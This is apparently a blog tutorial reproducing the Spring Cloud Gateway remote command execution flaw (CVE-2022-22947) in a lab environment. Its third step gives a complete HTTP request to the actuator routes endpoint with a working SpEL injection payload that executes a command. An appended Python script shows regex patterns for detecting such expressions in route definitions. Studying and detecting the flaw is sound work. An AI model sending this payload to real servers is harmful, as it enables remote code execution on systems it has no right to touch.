Spring Cloud Gateway Remote Command Execution Vulnerability (CVE-2022-22947)


Disclaimer: This article is for learning and reference only. All resources involved in it are from the Internet. Please do not use them for any illegal acts, otherwise you will bear the corresponding consequences yourself, and I do not assume any legal and joint and several liabilities.

Vulnerability description

Applications using Spring Cloud Gateway are vulnerable to code injection when the Actuator endpoint is enabled, exposed, and insecure. An attacker can maliciously craft requests that allow arbitrary remote execution on a remote host.

When an attacker has access to the actuator API, the vulnerability can be exploited to execute arbitrary commands.

Affected versions

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Other Spring Cloud Gateway versions that are no longer updated

Environment setup

The vulnerable environment is built with vulhub; look up the setup steps yourself.

After building successfully, visit


Vulnerability reproduction

1. Check that the actuator endpoint is enabled

Capture the request and change the path to /actuator
2. View /actuator/gateway/routes

The returned routing information shows that requests to index are routed to http://example.com:80

3. Create route
POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.10.171:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 431

{
    "id": "test",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "cmd"
            }
        }
    ],
    "uri": "http://example.com:80",
    "order": 0
}


4. Refresh routing

5. Access the created route


6. Delete route


7. Refresh the route again


8. Then, visit the route and find that the route has been deleted
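
One way to audit route definitions for the kind of filter argument used in step 3, as an added example that is not part of the original article. The `audit_route` helper, its severity labels and the sample routes are constructed for illustration; the `#{@userKeyResolver}` entry stands for a SpEL bean reference that deserves review rather than an alert.

```python
import json
import re

SPEL_TEMPLATE = re.compile(r"#\{.*\}", re.DOTALL)   # SpEL template delimiters
# Type references, constructors and process APIs reachable from an expression
RISKY = re.compile(r"\bT\s*\(|\bnew\s+[\w.]+|getRuntime|ProcessBuilder")


def iter_strings(node, path):
    """Yield (path, value) for every string nested in dicts and lists."""
    if isinstance(node, dict):
        for key, val in node.items():
            yield from iter_strings(val, f"{path}.{key}")
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from iter_strings(val, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node


def audit_route(route):
    """Return one finding per filter/predicate argument that contains SpEL."""
    findings = []
    for section in ("filters", "predicates"):
        for i, item in enumerate(route.get(section) or []):
            args = item.get("args", {}) if isinstance(item, dict) else {}
            for path, value in iter_strings(args, f"{section}[{i}].args"):
                if SPEL_TEMPLATE.search(value):
                    severity = "high" if RISKY.search(value) else "review"
                    findings.append((route.get("id"), path, severity))
    return findings


# Constructed sample routes; the third has the shape of the request body above.
SAMPLE_ROUTES = json.loads(r'''[
 {"id": "static", "uri": "http://example.com:80", "order": 0,
  "filters": [{"name": "AddResponseHeader", "args": {"name": "X-Env", "value": "prod"}}]},
 {"id": "limited", "uri": "http://example.com:80", "order": 0,
  "filters": [{"name": "RequestRateLimiter", "args": {"key-resolver": "#{@userKeyResolver}"}}]},
 {"id": "test", "uri": "http://example.com:80", "order": 0,
  "filters": [{"name": "AddResponseHeader", "args": {"name": "cmd",
   "value": "#{T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"})}"}}]}
]''')

if __name__ == "__main__":
    for route in SAMPLE_ROUTES:
        for finding in audit_route(route):
            print(finding)
```

The same check can be run over request bodies logged for POST /actuator/gateway/routes/{id}, since the expression only takes effect after the route is created and refreshed.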


Origin blog.csdn.net/guo15890025019/article/details/129503346